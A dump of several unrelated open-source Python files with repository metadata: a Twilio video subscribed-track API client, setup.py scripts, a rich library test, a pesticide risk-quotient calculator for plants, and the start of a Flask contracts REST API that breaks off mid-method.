self._uri = '/Rooms/{room_sid}/Participants/{participant_sid}/SubscribedTracks'.format(**self._solution)
def stream(self, limit=None, page_size=None):
"""
Streams SubscribedTrackInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, limit=None, page_size=None):
"""
Lists SubscribedTrackInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of SubscribedTrackInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
"""
params = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(
'GET',
self._uri,
params=params,
)
return SubscribedTrackPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of SubscribedTrackInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return SubscribedTrackPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a SubscribedTrackContext
:param sid: The SID that identifies the resource to fetch
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
"""
return SubscribedTrackContext(
self._version,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a SubscribedTrackContext
:param sid: The SID that identifies the resource to fetch
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
"""
return SubscribedTrackContext(
self._version,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
sid=sid,
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Video.V1.SubscribedTrackList>'
class SubscribedTrackPage(Page):
""" """
def __init__(self, version, response, solution):
"""
Initialize the SubscribedTrackPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param room_sid: The SID of the room where the track is published
:param participant_sid: The SID of the participant that subscribes to the track
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
"""
super(SubscribedTrackPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of SubscribedTrackInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
"""
return SubscribedTrackInstance(
self._version,
payload,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Video.V1.SubscribedTrackPage>'
class SubscribedTrackContext(InstanceContext):
""" """
def __init__(self, version, room_sid, participant_sid, sid):
"""
Initialize the SubscribedTrackContext
:param Version version: Version that contains the resource
:param room_sid: The SID of the Room where the Track resource to fetch is subscribed
:param participant_sid: The SID of the participant that subscribes to the Track resource to fetch
:param sid: The SID that identifies the resource to fetch
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
"""
super(SubscribedTrackContext, self).__init__(version)
# Path Solution
self._solution = {'room_sid': room_sid, 'participant_sid': participant_sid, 'sid': sid, }
self._uri = '/Rooms/{room_sid}/Participants/{participant_sid}/SubscribedTracks/{sid}'.format(**self._solution)
def fetch(self):
"""
Fetch a SubscribedTrackInstance
:returns: Fetched SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
"""
params = values.of({})
payload = self._version.fetch(
'GET',
self._uri,
params=params,
)
return SubscribedTrackInstance(
self._version,
payload,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
sid=self._solution['sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Video.V1.SubscribedTrackContext {}>'.format(context)
class SubscribedTrackInstance(InstanceResource):
""" """
class Kind(object):
AUDIO = "audio"
VIDEO = "video"
DATA = "data"
def __init__(self, version, payload, room_sid, participant_sid, sid=None):
"""
Initialize the SubscribedTrackInstance
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
"""
super(SubscribedTrackInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'sid': payload.get('sid'),
'participant_sid': payload.get('participant_sid'),
'publisher_sid': payload.get('publisher_sid'),
'room_sid': payload.get('room_sid'),
'name': payload.get('name'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'enabled': payload.get('enabled'),
'kind': payload.get('kind'),
'url': payload.get('url'),
}
# Context
self._context = None
self._solution = {
'room_sid': room_sid,
'participant_sid': participant_sid,
'sid': sid or self._properties['sid'],
}
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: SubscribedTrackContext for this SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
"""
if self._context is None:
self._context = SubscribedTrackContext(
self._version,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
sid=self._solution['sid'],
)
return self._context
@property
def sid(self):
"""
:returns: The unique string that identifies the resource
:rtype: unicode
"""
return self._properties['sid']
@property
def participant_sid(self):
"""
:returns: The SID of the participant that subscribes to the track
:rtype: unicode
"""
return self._properties['participant_sid']
@property
def publisher_sid(self):
"""
:returns: The SID of the participant that publishes the track
:rtype: unicode
"""
return self._properties['publisher_sid']
@property
def room_sid(self):
"""
:returns: The SID of the room where the track is published
:rtype: unicode
"""
return self._properties['room_sid']
@property
def name(self):
"""
:returns: The track name
:rtype: unicode
"""
return self._properties['name']
@property
def date_created(self):
"""
:returns: The ISO 8601 date and time in GMT when the resource was created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The ISO 8601 date and time in GMT when the resource was last updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def enabled(self):
"""
:returns: Whether the track is enabled
:rtype: bool
"""
return self._properties['enabled']
@property
def kind(self):
"""
:returns: The track type
:rtype: SubscribedTrackInstance.Kind
"""
return self._properties['kind']
@property
def url(self):
"""
:returns: The absolute URL of the resource
:rtype: unicode
"""
return self._properties['url']
def fetch(self):
"""
Fetch a SubscribedTrackInstance
:returns: Fetched SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
"""
return self._proxy.fetch()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Video.V1.SubscribedTrackInstance {}>'.format(context)
|
tysonholub/twilio-python
|
twilio/rest/video/v1/room/room_participant/room_participant_subscribed_track.py
|
Python
|
mit
| 15,072
| 0.003715
|
#!/usr/bin/python
# coding=utf-8
from setuptools import setup, find_packages
setup(
name = "HEIGVD_TimetableParser",
version = "0.1",
packages = find_packages(),
install_requires = ['icalendar>=3.5', 'xlrd>=0.9.2'],
# metadata for upload to PyPI
author = "Leeroy Brun",
author_email = "leeroy.brun@gmail.com",
description = "Transforme un horaire au format XLS provenant de l'intranet du département FEE de la HEIG-VD en un fichier ICS.",
license = "MIT",
keywords = "heig-vd ics xls fee",
url = "https://github.com/leeroybrun/heigvd-timetable-parser",
)
|
leeroybrun/heigvd-timetable-parser
|
setup.py
|
Python
|
mit
| 604
| 0.036484
|
import io
from rich.console import Console
from rich.measure import Measurement
from rich.styled import Styled
def test_styled():
styled_foo = Styled("foo", "on red")
console = Console(file=io.StringIO(), force_terminal=True, _environ={})
assert Measurement.get(console, console.options, styled_foo) == Measurement(3, 3)
console.print(styled_foo)
result = console.file.getvalue()
expected = "\x1b[41mfoo\x1b[0m\n"
assert result == expected
|
willmcgugan/rich
|
tests/test_styled.py
|
Python
|
mit
| 471
| 0.002123
|
from __future__ import division #brings in Python 3.0 mixed type calculation rules
import logging
import numpy as np
import pandas as pd
class TerrplantFunctions(object):
"""
Function class for Stir.
"""
def __init__(self):
"""Class representing the functions for Sip"""
super(TerrplantFunctions, self).__init__()
def run_dry(self):
"""
EEC for runoff for dry areas
"""
self.out_run_dry = (self.application_rate / self.incorporation_depth) * self.runoff_fraction
return self.out_run_dry
def run_semi(self):
"""
EEC for runoff to semi-aquatic areas
"""
self.out_run_semi = (self.application_rate / self.incorporation_depth) * self.runoff_fraction * 10
return self.out_run_semi
def spray(self):
"""
EEC for spray drift
"""
self.out_spray = self.application_rate * self.drift_fraction
return self.out_spray
def total_dry(self):
"""
EEC total for dry areas
"""
self.out_total_dry = self.out_run_dry + self.out_spray
return self.out_total_dry
def total_semi(self):
"""
EEC total for semi-aquatic areas
"""
self.out_total_semi = self.out_run_semi + self.out_spray
return self.out_total_semi
def nms_rq_dry(self):
"""
Risk Quotient for NON-LISTED MONOCOT seedlings exposed to Pesticide X in a DRY area
"""
self.out_nms_rq_dry = self.out_total_dry / self.ec25_nonlisted_seedling_emergence_monocot
return self.out_nms_rq_dry
def loc_nms_dry(self):
"""
Level of concern for non-listed monocot seedlings exposed to pesticide X in a dry area
"""
msg_pass = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk."
msg_fail = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nms_rq_dry]
self.out_nms_loc_dry = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
# exceed_boolean = self.out_nms_rq_dry >= 1.0
# self.out_nms_loc_dry = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal.')
return self.out_nms_loc_dry
def nms_rq_semi(self):
"""
Risk Quotient for NON-LISTED MONOCOT seedlings exposed to Pesticide X in a SEMI-AQUATIC area
"""
self.out_nms_rq_semi = self.out_total_semi / self.ec25_nonlisted_seedling_emergence_monocot
return self.out_nms_rq_semi
def loc_nms_semi(self):
"""
Level of concern for non-listed monocot seedlings exposed to pesticide X in a semi-aquatic area
"""
msg_pass = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk."
msg_fail = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nms_rq_semi]
self.out_nms_loc_semi = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nms_rq_semi >= 1.0
#self.out_nms_loc_semi = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal.')
return self.out_nms_loc_semi
def nms_rq_spray(self):
"""
Risk Quotient for NON-LISTED MONOCOT seedlings exposed to Pesticide X via SPRAY drift
"""
self.out_nms_rq_spray = self.out_spray / self.out_min_nms_spray
return self.out_nms_rq_spray
def loc_nms_spray(self):
"""
Level of concern for non-listed monocot seedlings exposed to pesticide via spray drift
"""
msg_pass = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates a potential risk."
msg_fail = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nms_rq_spray]
self.out_nms_loc_spray = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nms_rq_spray >= 1.0
#self.out_nms_loc_spray = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal.')
return self.out_nms_loc_spray
def lms_rq_dry(self):
"""
Risk Quotient for LISTED MONOCOT seedlings exposed to Pesticide X in a DRY areas
"""
self.out_lms_rq_dry = self.out_total_dry / self.noaec_listed_seedling_emergence_monocot
return self.out_lms_rq_dry
def loc_lms_dry(self):
"""
Level of concern for listed monocot seedlings exposed to pesticide via runoff in a dry area
"""
msg_pass = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk."
msg_fail = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lms_rq_dry]
self.out_lms_loc_dry = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lms_rq_dry >= 1.0
#self.out_lms_loc_dry = exceed_boolean.map(lambda x:
# 'The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk.' if x == True
# else 'The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal.')
return self.out_lms_loc_dry
def lms_rq_semi(self):
"""
Risk Quotient for LISTED MONOCOT seedlings exposed to Pesticide X in a SEMI-AQUATIC area
"""
self.out_lms_rq_semi = self.out_total_semi / self.noaec_listed_seedling_emergence_monocot
return self.out_lms_rq_semi
def loc_lms_semi(self):
"""
Level of concern for listed monocot seedlings exposed to pesticide X in semi-aquatic areas
"""
msg_pass = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk."
msg_fail = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lms_rq_semi]
self.out_lms_loc_semi = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lms_rq_semi >= 1.0
#self.out_lms_loc_semi = exceed_boolean.map(lambda x:
# 'The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk.' if x == True
# else 'The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal.')
return self.out_lms_loc_semi
def lms_rq_spray(self):
"""
Risk Quotient for LISTED MONOCOT seedlings exposed to Pesticide X via SPRAY drift
"""
self.out_lms_rq_spray = self.out_spray / self.out_min_lms_spray
return self.out_lms_rq_spray
def loc_lms_spray(self):
"""
Level of concern for listed monocot seedlings exposed to pesticide X via spray drift
"""
msg_pass = "The risk quotient for listed monocot seedlings exposed to the pesticide via spray drift indicates a potential risk."
msg_fail = "The risk quotient for listed monocot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lms_rq_spray]
self.out_lms_loc_spray = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lms_rq_spray >= 1.0
#self.out_lms_loc_spray = exceed_boolean.map(lambda x:
# 'The risk quotient for listed monocot seedlings exposed to the pesticide via spray drift indicates a potential risk.' if x == True
# else 'The risk quotient for listed monocot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal.')
return self.out_lms_loc_spray
def nds_rq_dry(self):
"""
Risk Quotient for NON-LISTED DICOT seedlings exposed to Pesticide X in DRY areas
"""
self.out_nds_rq_dry = self.out_total_dry / self.ec25_nonlisted_seedling_emergence_dicot
return self.out_nds_rq_dry
def loc_nds_dry(self):
"""
Level of concern for non-listed dicot seedlings exposed to pesticide X in dry areas
"""
msg_pass = "The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk."
msg_fail = "The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nds_rq_dry]
self.out_nds_loc_dry = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nds_rq_dry >= 1.0
#self.out_nds_loc_dry = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal.')
return self.out_nds_loc_dry
def nds_rq_semi(self):
"""
Risk Quotient for NON-LISTED DICOT seedlings exposed to Pesticide X in SEMI-AQUATIC areas
"""
self.out_nds_rq_semi = self.out_total_semi / self.ec25_nonlisted_seedling_emergence_dicot
return self.out_nds_rq_semi
def loc_nds_semi(self):
"""
Level of concern for non-listed dicot seedlings exposed to pesticide X in semi-aquatic areas
"""
msg_pass = "The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk."
msg_fail = "The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nds_rq_semi]
self.out_nds_loc_semi = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nds_rq_semi >= 1.0
#self.out_nds_loc_semi = exceed_boolean.map(lambda x:
#'The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal.')
return self.out_nds_loc_semi
def nds_rq_spray(self):
"""
# Risk Quotient for NON-LISTED DICOT seedlings exposed to Pesticide X via SPRAY drift
"""
self.out_nds_rq_spray = self.out_spray / self.out_min_nds_spray
return self.out_nds_rq_spray
def loc_nds_spray(self):
"""
Level of concern for non-listed dicot seedlings exposed to pesticide X via spray drift
"""
msg_pass = "The risk quotient for non-listed dicot seedlings exposed to the pesticide via spray drift indicates a potential risk."
msg_fail = "The risk quotient for non-listed dicot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nds_rq_spray]
self.out_nds_loc_spray = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nds_rq_spray >= 1.0
#self.out_nds_loc_spray = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed dicot seedlings exposed to the pesticide via spray drift indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed dicot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal.')
return self.out_nds_loc_spray
def lds_rq_dry(self):
"""
Risk Quotient for LISTED DICOT seedlings exposed to Pesticide X in DRY areas
"""
self.out_lds_rq_dry = self.out_total_dry / self.noaec_listed_seedling_emergence_dicot
return self.out_lds_rq_dry
def loc_lds_dry(self):
"""
Level of concern for listed dicot seedlings exposed to pesticideX in dry areas
"""
msg_pass = "The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk."
msg_fail = "The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lds_rq_dry]
self.out_lds_loc_dry = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lds_rq_dry >= 1.0
#self.out_lds_loc_dry = exceed_boolean.map(lambda x:
# 'The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk.' if x == True
# else 'The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal.')
return self.out_lds_loc_dry
def lds_rq_semi(self):
"""
Risk Quotient for LISTED DICOT seedlings exposed to Pesticide X in SEMI-AQUATIC areas
"""
self.out_lds_rq_semi = self.out_total_semi / self.noaec_listed_seedling_emergence_dicot
return self.out_lds_rq_semi
def loc_lds_semi(self):
"""
Level of concern for listed dicot seedlings exposed to pesticide X in dry areas
"""
msg_pass = "The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk."
msg_fail = "The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lds_rq_semi]
self.out_lds_loc_semi = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lds_rq_semi >= 1.0
#self.out_lds_loc_semi = exceed_boolean.map(lambda x:
# 'The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk.' if x == True
# else 'The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal.')
return self.out_lds_loc_semi
def lds_rq_spray(self):
"""
Risk Quotient for LISTED DICOT seedlings exposed to Pesticide X via SPRAY drift
"""
self.out_lds_rq_spray = self.out_spray / self.out_min_lds_spray
return self.out_lds_rq_spray
def loc_lds_spray(self):
"""
Level of concern for listed dicot seedlings exposed to pesticide X via spray drift
"""
msg_pass = "The risk quotient for listed dicot seedlings exposed to the pesticide via spray drift indicates a potential risk."
msg_fail = "The risk quotient for listed dicot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lds_rq_spray]
self.out_lds_loc_spray = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lds_rq_spray >= 1.0
#self.out_lds_loc_spray = exceed_boolean.map(
# lambda x:
# 'The risk quotient for listed dicot seedlings exposed to the pesticide via spray drift indicates a potential risk.' if x == True
# else 'The risk quotient for listed dicot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal.')
return self.out_lds_loc_spray
def min_nms_spray(self):
"""
determine minimum toxicity concentration used for RQ spray drift values
non-listed monocot EC25 and NOAEC
"""
s1 = pd.Series(self.ec25_nonlisted_seedling_emergence_monocot, name='seedling')
s2 = pd.Series(self.ec25_nonlisted_vegetative_vigor_monocot, name='vegetative')
df = pd.concat([s1, s2], axis=1)
self.out_min_nms_spray = pd.DataFrame.min(df, axis=1)
return self.out_min_nms_spray
def min_lms_spray(self):
"""
determine minimum toxicity concentration used for RQ spray drift values
listed monocot EC25 and NOAEC
"""
s1 = pd.Series(self.noaec_listed_seedling_emergence_monocot, name='seedling')
s2 = pd.Series(self.noaec_listed_vegetative_vigor_monocot, name='vegetative')
df = pd.concat([s1, s2], axis=1)
self.out_min_lms_spray = pd.DataFrame.min(df, axis=1)
return self.out_min_lms_spray
def min_nds_spray(self):
"""
determine minimum toxicity concentration used for RQ spray drift values
non-listed dicot EC25 and NOAEC
"""
s1 = pd.Series(self.ec25_nonlisted_seedling_emergence_dicot, name='seedling')
s2 = pd.Series(self.ec25_nonlisted_vegetative_vigor_dicot, name='vegetative')
df = pd.concat([s1, s2], axis=1)
self.out_min_nds_spray = pd.DataFrame.min(df, axis=1)
return self.out_min_nds_spray
def min_lds_spray(self):
"""
determine minimum toxicity concentration used for RQ spray drift values
listed dicot EC25 and NOAEC
"""
s1 = pd.Series(self.noaec_listed_seedling_emergence_dicot, name='seedling')
s2 = pd.Series(self.noaec_listed_vegetative_vigor_dicot, name='vegetative')
df = pd.concat([s1, s2], axis=1)
self.out_min_lds_spray = pd.DataFrame.min(df, axis=1)
return self.out_min_lds_spray
|
puruckertom/ubertool
|
ubertool/terrplant/terrplant_functions.py
|
Python
|
unlicense
| 20,304
| 0.006403
|
from setuptools import setup
version = '0.4'
setup(
name = 'django-cache-decorator',
packages = ['django_cache_decorator'],
license = 'MIT',
version = version,
description = 'Easily add caching to functions within a django project.',
long_description=open('README.md').read(),
author = 'Richard Caceres',
author_email = 'me@rchrd.net',
url = 'https://github.com/rchrd2/django-cache-decorator/',
download_url = 'https://github.com/rchrd2/django-cache-decorator/tarball/' + version,
keywords = ['django','caching','decorator'],
classifiers = [],
)
|
rchrd2/django-cache-decorator
|
setup.py
|
Python
|
mit
| 596
| 0.041946
|
# -*- coding: utf-8 -*-
import os
import json
from sqlalchemy import and_, extract, func, desc
from datetime import datetime
from jinja2 import TemplateNotFound
from flask import Blueprint, render_template, send_from_directory, abort, request
from flask.ext.paginate import Pagination
from flask.ext import restful
from flask.ext.restful import fields
from flask.ext.restful.reqparse import RequestParser
from .models import Contrato
from gastosabertos.extensions import db
# Blueprint for Contrato
contratos = Blueprint('contratos', __name__,
template_folder='templates',
static_folder='static',
static_url_path='/contrato/static')
# Create the restful API
contratos_api = restful.Api(contratos, prefix="/api/v1")
# receita_api.decorators = [cors.crossdomain(origin='*')]
# class Date(fields.Raw):
# def format(self, value):
# return str(value)
# Parser for RevenueAPI arguments
contratos_list_parser = RequestParser()
contratos_list_parser.add_argument('cnpj')
contratos_list_parser.add_argument('orgao')
contratos_list_parser.add_argument('modalidade')
contratos_list_parser.add_argument('evento')
contratos_list_parser.add_argument('objeto')
contratos_list_parser.add_argument('processo_administrativo')
contratos_list_parser.add_argument('nome_fornecedor')
contratos_list_parser.add_argument('licitacao')
contratos_list_parser.add_argument('group_by', default='')
contratos_list_parser.add_argument('order_by', 'id')
contratos_list_parser.add_argument('page', type=int, default=0)
contratos_list_parser.add_argument('per_page_num', type=int, default=100)
# Fields for ContratoAPI data marshal
contratos_fields = { 'id': fields.Integer()
, 'orgao': fields.String()
, 'data_assinatura': fields.DateTime(dt_format='iso8601')
, 'vigencia': fields.Integer()
, 'objeto': fields.String()
, 'modalidade': fields.String()
, 'evento': fields.String()
, 'processo_administrativo': fields.String()
, 'cnpj': fields.String()
, 'nome_fornecedor': fields.String()
, 'valor': fields.Float()
, 'licitacao': fields.String()
, 'data_publicacao': fields.DateTime(dt_format='iso8601') }
class ContratoApi(restful.Resource):
def filter(self, contratos_data):
# Extract the arguments in GET request
args = contratos_list_parser.parse_args()
cnpj = args['cnpj']
nome_fornecedor = args['nome_fornecedor']
orgao = args['orgao']
modalidade = args['modalidade']
evento = args['evento']
objeto = args['objeto']
processo_administrativo = args['processo_administrativo']
licitacao = args['licitacao']
if cnpj:
contratos_data = contratos_data.filter(Contrato.cnpj == cnpj)
if nome_fornecedor:
nome_query = u'%{}%'.format(nome_fornecedor)
contratos_data = contratos_data.filter(Contrato.nome_fornecedor.ilike(nome_query))
if orgao:
orgao_query = u'%{}%'.format(orgao)
contratos_data = contratos_data.filter(Contrato.orgao.ilike(orgao_query))
if modalidade:
modalidade_query = u'%{}%'.format(modalidade)
contratos_data = contratos_data.filter(Contrato.modalidade.ilike(modalidade_query))
if evento:
evento_query = u'%{}%'.format(evento)
contratos_data = contratos_data.filter(Contrato.evento.ilike(evento_query))
if objeto:
objeto_query = u'%{}%'.format(objeto)
contratos_data = contratos_data.filter(Contrato.objeto.ilike(objeto_query))
if processo_administrativo:
processo_administrativo_query = u'%{}%'.format(processo_administrativo)
contratos_data = contratos_data.filter(Contrato.processo_administrativo.ilike(processo_administrativo_query))
if licitacao:
licitacao_query = u'%{}%'.format(licitacao)
contratos_data = contratos_data.filter(Contrato.licitacao.ilike(licitacao_query))
return contratos_data
def order(self, contratos_data):
args = contratos_list_parser.parse_args()
order_by = args['order_by'].split(',')
if order_by:
order_by_args = []
for field_name in order_by:
desc_ = False
if field_name.startswith('-'):
field_name = field_name[1:]
desc_ = True
if field_name in contratos_fields or field_name == 'count':
order_by_arg = field_name
if desc_:
order_by_arg = desc(order_by_arg)
order_by_args.append(order_by_arg)
contratos_data = contratos_data.order_by(*order_by_args)
return contratos_data
def paginate(self, contratos_data):
args = contratos_list_parser.parse_args()
page = args['page']
per_page_num = args['per_page_num']
# Limit que number of results per page
contratos_data = contratos_data.offset(page*per_page_num).limit(per_page_num)
return contratos_data
class ContratoListApi(ContratoApi):
@restful.marshal_with(contratos_fields)
def get(self):
